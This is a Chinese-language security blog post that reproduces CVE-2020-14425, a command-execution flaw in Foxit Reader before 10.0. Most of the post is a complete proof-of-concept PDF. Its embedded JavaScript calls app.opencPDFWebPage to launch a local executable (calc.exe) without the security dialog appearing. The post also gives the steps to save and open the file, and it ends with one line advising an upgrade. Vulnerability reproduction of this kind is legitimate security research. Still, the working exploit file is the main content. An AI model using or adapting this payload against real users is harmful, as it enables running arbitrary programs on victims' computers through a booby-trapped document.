Foxit Reader 命令入漏洞(CVE-2020-14425)复现

admin 2021年4月2日02:49:19评论79 views字数 2716阅读9分3秒阅读模式

简介

 

Foxit Reader(福昕阅读器)是一个小巧的PDF文档阅读器,完全免费(非开源软件)

 

影响版本

 Foxit Reader < 10.0

 

漏洞复现

 

这里用Foxit Reader9.7.1进行测试

 

Foxit Reader 命令入漏洞(CVE-2020-14425)复现


Poc# Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)# Exploit Author: Nassim Asrir# Vendor Homepage: https://www.foxitsoftware.com/# Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog.# CVE-2020-14425 The exploit process need the user-interaction (Opening the PDF) . + Process continuation #POC %PDF-1.4%ó?ìá1 0 obj<</CreationDate(D:20200821171007+02'00')/Title(Hi, Can you see me ?)/Creator(AnonymousUser)>>endobj2 0 obj<</Type/Catalog/Pages 3 0 R/Names<</JavaScript 10 0 R>>>>endobj3 0 obj<</Type/Pages/Count 1/Kids[4 0 R]>>endobj4 0 obj<</Type/Page/MediaBox[0 0 595 842]/Parent 3 0 R/Contents 5 0 R/Resources<</ProcSet [/PDF/Text/ImageB/ImageC/ImageI]/ExtGState<</GS0 6 0 R>>/Font<</F0 8 0 R>>>>/Group<</CS/DeviceRGB/S/Transparency/I false/K false>>>>endobj5 0 obj<</Length 94/Filter/FlateDecode>>streamx???@@E?ù?[R?k-x??ü?W"DD????a?ü??b°y“{?éTg??tS)d?‘±=d??t+9?_?if?è??[??B_5!d§ZhP>ˉ ‰endstreamendobj6 0 obj<</Type/ExtGState/ca 1>>endobj7 0 obj<</Type/FontDescriptor/Ascent 833/CapHeight 592/Descent -300/Flags 32/FontBBox[-192 -710 702 1221]/ItalicAngle 0/StemV 0/XHeight 443/FontName/CourierNew,Bold>>endobj8 0 obj<</Type/Font/Subtype/TrueType/BaseFont/CourierNew,Bold/Encoding/WinAnsiEncoding/FontDescriptor 7 0 R/FirstChar 0/LastChar 255/Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600]>>endobj9 0 obj<</S/JavaScript/JS(app.opencPDFWebPage('C:\\Windows\\System32\\calc.exe') )>>endobj10 0 obj<</Names[(EmbeddedJS)9 0 R]>>endobjxref0 110000000000 65535 f0000000015 00000 n0000000170 00000 n0000000250 00000 n0000000305 00000 n0000000560 00000 n0000000724 00000 n0000000767 00000 n0000000953 00000 n0000002137 00000 n0000002235 00000 ntrailer<</ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>]/Info 1 0 R/Root 2 0 R/Size 11>>startxref2283%%EOF


 

保存为exp.pdf,然后双击打开

 

Foxit Reader 命令入漏洞(CVE-2020-14425)复现

Foxit Reader 命令入漏洞(CVE-2020-14425)复现

Foxit Reader 命令入漏洞(CVE-2020-14425)复现

弹出计算器

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Foxit Reader 命令入漏洞(CVE-2020-14425)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日02:49:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Foxit Reader 命令入漏洞(CVE-2020-14425)复现https://cn-sec.com/archives/314457.html

发表评论

匿名网友 填写信息